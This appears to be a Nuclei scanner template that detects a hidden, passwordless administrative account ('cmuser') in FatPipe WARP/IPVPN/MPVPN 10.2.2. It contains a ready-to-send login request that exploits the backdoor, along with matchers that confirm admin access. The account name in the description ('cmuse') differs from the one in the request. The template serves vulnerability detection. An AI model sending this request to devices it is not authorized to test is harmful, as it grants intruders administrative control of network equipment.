42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: fatpipe-backdoor
|
|
|
|
info:
|
|
name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Authorization Bypass
|
|
author: gy741
|
|
severity: high
|
|
description: FatPipe WARP/IPVPN/MPVPN 10.2.2 contains an authorization bypass vulnerability via hidden administrative account cmuse, which has no password, has write access permissions to the device, and is not visible in Users menu list. An attacker can gain access by bypassing proper authorization, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
|
|
- https://www.fatpipeinc.com/support/advisories.php
|
|
metadata:
|
|
max-request: 1
|
|
tags: fatpipe,default-login,backdoor,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /fpui/loginServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- '"loginRes":"success"'
|
|
- '"activeUserName":"cmuser"'
|
|
condition: and
|
|
|
|
# digest: 4a0a0047304502200faa17b31806daa7ce474242a3c9520fcb4be359a94d97190f3f41dd715c4020022100e8964ba19cfcad5a1ee525c6aa539997fdacb758e37b0c70e05eb954094a69de:922c64590222798bb761d5b6d8e72950
|